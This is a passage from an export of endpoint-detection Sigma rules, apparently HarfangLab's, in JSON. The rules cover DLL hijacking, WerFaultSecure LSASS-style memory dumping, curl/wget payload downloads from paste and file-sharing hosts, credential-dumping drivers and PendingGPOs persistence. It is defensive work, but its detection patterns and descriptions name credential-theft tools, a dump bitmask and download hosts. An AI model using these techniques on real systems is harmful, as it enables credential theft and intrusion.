'?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "33c950a0-ccc5-4ddb-a153-b5550bf0d290", "rule_name": "DLL Hijacking via MsiDb.exe", "rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiDb.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-10-05", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "33d2f606-2c1d-494f-9455-fba0a918e6eb", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.086132Z", "creation_date": "2026-03-23T11:45:34.086134Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.086139Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html", "https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html", "https://attack.mitre.org/techniques/T1003/001/", "https://attack.mitre.org/techniques/T1068/" ], "name": "t1003_001_werfaultsecure_bitmask.yml", "content": "title: Suspicious WerFaultSecure Execution\nid: 33d2f606-2c1d-494f-9455-fba0a918e6eb\ndescription: |\n Detects the execution of WerFaultSecure.exe using a suspicious type bitmask.\n WerFaultSecure is a Microsoft-signed binary for Protected Process error reporting.\n This rule detects a suspicious dump type bitmask usage that has only been observed in WSASS and EDRFreeze hacktools.\n Attackers can abuse this legitimate tool by abusing its capabilities for process memory dumping, bypassing security controls through Living off the Land techniques.\n It is recommended to investigate the parent process to determine the legitimacy of this action and analyze the \"/pid\" argument to determine the criticity of the targeted process.\nreferences:\n - https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html\n - https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html\n - https://attack.mitre.org/techniques/T1003/001/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2025/09/22\nmodified: 2025/10/13\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.privilege_escalation\n - attack.t1068\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.WSASS\n - classification.Windows.HackTool.EDRFreeze\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'WerFaultSecure.exe'\n CommandLine|contains: '/type 268310' # MiniDumpWithFullMemory | MiniDumpWithHandleData | MiniDumpScanMemory | MiniDumpWithFullMemoryInfo | MiniDumpWithThreadInfo | MiniDumpWithTokenInformation\n\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "33d2f606-2c1d-494f-9455-fba0a918e6eb", "rule_name": "Suspicious WerFaultSecure Execution", "rule_description": "Detects the execution of WerFaultSecure.exe using a suspicious type bitmask.\nWerFaultSecure is a Microsoft-signed binary for Protected Process error reporting.\nThis rule detects a suspicious dump type bitmask usage that has only been observed in WSASS and EDRFreeze hacktools.\nAttackers can abuse this legitimate tool by abusing its capabilities for process memory dumping, bypassing security controls through Living off the Land techniques.\nIt is recommended to investigate the parent process to determine the legitimacy of this action and analyze the \"/pid\" argument to determine the criticity of the targeted process.\n", "rule_creation_date": "2025-09-22", "rule_modified_date": "2025-10-13", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1003.001", "attack.t1068" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "33eb8e8a-ac3d-4882-a33c-a06936e7ac1c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.592265Z", "creation_date": "2026-03-23T11:45:34.592268Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.592275Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://twitter.com/an0n_r0/status/1544472352657915904", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_wscript.yml", "content": "title: DLL Hijacking via wscript.exe\nid: 33eb8e8a-ac3d-4882-a33c-a06936e7ac1c\ndescription: |\n Detects potential Windows DLL Hijacking via wscript.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wscript.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "33eb8e8a-ac3d-4882-a33c-a06936e7ac1c", "rule_name": "DLL Hijacking via wscript.exe", "rule_description": "Detects potential Windows DLL Hijacking via wscript.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "33f20b55-a6a9-47fa-8058-df707fd25325", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.095386Z", "creation_date": "2026-03-23T11:45:34.095388Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.095392Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1105/", "https://attack.mitre.org/techniques/T1071/001/" ], "name": "t1105_curl_suspicious_link_macos.yml", "content": "title: File Downloaded via cURL or wget from Suspicious URL (macOS)\nid: 33f20b55-a6a9-47fa-8058-df707fd25325\ndescription: |\n Detects the usage of cURL or wget to download a file from public hosting services that may contain a malicious payload.\n This technique is used by attackers to download payloads that are hosted on public websites.\n It is recommended to perform an analysis of the downloaded file to check if the content is malicious.\nreferences:\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/02/13\nmodified: 2025/09/10\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Wget\n - classification.macOS.LOLBin.Curl\n - classification.macOS.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith:\n - '/wget'\n - '/curl'\n CommandLine|contains:\n - 'cdn.discordapp.com'\n - 'api.telegram.org'\n - 'www.dropbox.com'\n - 'api.dropboxapi.com'\n - 'content.dropboxapi.com'\n - 'transfer.sh'\n - 'anonfiles.com'\n - 'file.io'\n - 'gofile.io'\n - 'raw.githubusercontent.com'\n - 'gist.githubusercontent.com'\n - 'pastebin.com'\n - 'mediafire.com'\n - 'mega.nz'\n - 'ddns.net'\n - '.paste.ee'\n - '.hastebin.com'\n - '.ghostbin.co/'\n - 'ufile.io'\n - 'storage.googleapis.com'\n - 'send.exploit.in'\n - 'privatlab.net'\n - 'privatlab.com'\n - 'sendspace.com'\n - 'pastetext.net'\n - 'pastebin.pl'\n - 'paste.ee'\n - 'pastie.org'\n - 'archive.org'\n - 'paste.c-net.org'\n\n exclusion_timesketch:\n CommandLine|contains: ' https://raw.githubusercontent.com/google/'\n\n exclusion_homebrew:\n CommandLine|contains: ' https://raw.githubusercontent.com/Homebrew/'\n\n exclusion_ohmyzsh:\n CommandLine|contains: ' https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh'\n\n exclusion_ruby_brew_update:\n ParentCommandLine|startswith: '/opt/homebrew/library/homebrew/vendor/portable-ruby/current/bin/ruby -w1 --disable=gems,rubyopt /opt/homebrew/library/homebrew/brew.rb upgrade'\n\n exclusion_nvm:\n CommandLine: 'curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v*/install.sh'\n\n exclusion_nix:\n CommandLine|contains: ' https://raw.githubusercontent.com/nixos/experimental-nix-installer/'\n\n exclusion_vscode:\n CommandLine|contains:\n - ' https://raw.githubusercontent.com/microsoft/vscode/master/extensions/json-language-features/package.json'\n - ' https://raw.githubusercontent.com/microsoft/pyright/*/packages/vscode-pyright/package.json'\n - ' https://raw.githubusercontent.com/microsoft/vscode/main/extensions/typescript-language-features/package.json'\n - ' https://raw.githubusercontent.com/rust-analyzer/rust-analyzer/*/editors/code/package.json'\n - ' https://raw.githubusercontent.com/luals/vscode-lua/master/package.json'\n\n exclusion_apache:\n CommandLine|contains: ' https://raw.githubusercontent.com/apache/'\n\n exclusion_installomator:\n CommandLine: 'curl -o installomator.sh https://raw.githubusercontent.com/installomator/installomator/main/installomator.sh'\n\n exclusion_minikube:\n CommandLine|contains: 'curl -LO https://storage.googleapis.com/minikube/releases/latest/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "33f20b55-a6a9-47fa-8058-df707fd25325", "rule_name": "File Downloaded via cURL or wget from Suspicious URL (macOS)", "rule_description": "Detects the usage of cURL or wget to download a file from public hosting services that may contain a malicious payload.\nThis technique is used by attackers to download payloads that are hosted on public websites.\nIt is recommended to perform an analysis of the downloaded file to check if the content is malicious.\n", "rule_creation_date": "2023-02-13", "rule_modified_date": "2025-09-10", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control" ], "rule_technique_tags": [ "attack.t1071.001", "attack.t1105" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "340aa5a9-5616-4c66-a76c-91098df5a7b3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.086442Z", "creation_date": "2026-03-23T11:45:34.086444Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.086449Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "http://foofus.net/goons/fizzgig/fgdump/", "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PWDumpX.htm", "https://github.com/gentilkiwi/mimikatz", "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/gsecdump.htm", "http://foofus.net/goons/fizzgig/pwdump/", "https://attack.mitre.org/software/S0119/", "https://attack.mitre.org/techniques/T1068/", "https://attack.mitre.org/techniques/T1003/" ], "name": "t1003_malicious_driver_for_credential_dumping.yml", "content": "title: Malicious Driver Linked to Credential Dumping Loaded\nid: 340aa5a9-5616-4c66-a76c-91098df5a7b3\ndescription: |\n Detects the loading of malicious Windows kernel drivers that have the ability to perform credential dumping.\n Attackers may try to dump secrets or credentials from the system directly from the kernel to use for later lateral movement or persistence.\n These drivers are either signed (usually maliciously) or unsigned, if integrity checks were disabled earlier in the injection chain.\n It is recommended to analyze the context around the loading of the malicious driver to look for other malicious actions on the host.\nreferences:\n - http://foofus.net/goons/fizzgig/fgdump/\n - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PWDumpX.htm\n - https://github.com/gentilkiwi/mimikatz\n - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/gsecdump.htm\n - http://foofus.net/goons/fizzgig/pwdump/\n - https://attack.mitre.org/software/S0119/\n - https://attack.mitre.org/techniques/T1068/\n - https://attack.mitre.org/techniques/T1003/\ndate: 2022/08/02\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.credential_access\n - attack.t1003\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Rootkit.CredentialDumper\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: driver_load\ndetection:\n selection:\n ImageLoaded|contains:\n - 'fgexec'\n - 'dumpsvc'\n - 'cachedump'\n - 'mimidrv'\n - 'gsecdump'\n - 'servpw'\n - 'pwdump'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "340aa5a9-5616-4c66-a76c-91098df5a7b3", "rule_name": "Malicious Driver Linked to Credential Dumping Loaded", "rule_description": "Detects the loading of malicious Windows kernel drivers that have the ability to perform credential dumping.\nAttackers may try to dump secrets or credentials from the system directly from the kernel to use for later lateral movement or persistence.\nThese drivers are either signed (usually maliciously) or unsigned, if integrity checks were disabled earlier in the injection chain.\nIt is recommended to analyze the context around the loading of the malicious driver to look for other malicious actions on the host.\n", "rule_creation_date": "2022-08-02", "rule_modified_date": "2025-01-09", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1003", "attack.t1068" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "34295504-9358-4119-aa08-84b4c5880ad5", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.097205Z", "creation_date": "2026-03-23T11:45:34.097207Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.097211Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html", "https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_k7sysmon.yml", "content": "title: DLL Hijacking via K7SysMon.exe\nid: 34295504-9358-4119-aa08-84b4c5880ad5\ndescription: |\n Detects potential Windows DLL Hijacking via K7SysMon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'K7SysMon.EXE'\n ImageLoaded|endswith: '\\K7SysMn1.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'K7 Computing Pvt Ltd'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "34295504-9358-4119-aa08-84b4c5880ad5", "rule_name": "DLL Hijacking via K7SysMon.exe", "rule_description": "Detects potential Windows DLL Hijacking via K7SysMon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2023-09-05", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "3437577c-61e0-46ac-9f02-bbc91228e25f", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.072669Z", "creation_date": "2026-03-23T11:45:34.072671Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.072675Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1484/001/", "https://securelist.com/gootkit-the-cautious-trojan/102731/" ], "name": "t1484_001_persistence_registry_pendinggpos.yml", "content": "title: Pending GPOs Added\nid: 3437577c-61e0-46ac-9f02-bbc91228e25f\ndescription: |\n Detects when an entry in pending GPOs is added to the registry. This has been used by malwares such as GootKit.\n To achieve persistence, the malware generates an INF file containing a [DefaultInstall] section that references the payload.\n It then modifies the PendingGPOs registry key, inserting the absolute path of the INF file.\n When explorer.exe processes Group Policy Objects (GPOs), it executes the payload specified in the [DefaultInstall] section of the INF file.\n It is recommended to ensure that this modification is legitimate and performed by an authorized administrator. You need to review the [DefaultInstall] section of the INF file to check if it includes an absolute path to malware.\nreferences:\n - https://attack.mitre.org/techniques/T1484/001/\n - https://securelist.com/gootkit-the-cautious-trojan/102731/\ndate: 2020/09/24\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1484.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n # PendingGPOs trick used by gootkit for instance\n # contains X values :\n # Count (set to 1)\n # SectionX (Section1/Section2/...) : DefaultInstall for instance (in .ini file)\n # PathX (Path1/Path2/...) : path to ini file\n\n # only alert on PathX being set (others are meaningless)\n TargetObject|contains: '\\SOFTWARE\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Path'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_ie_custom_settings:\n # commandline : rundll32 iedkcs32.dll,BrandExternal ;*2,3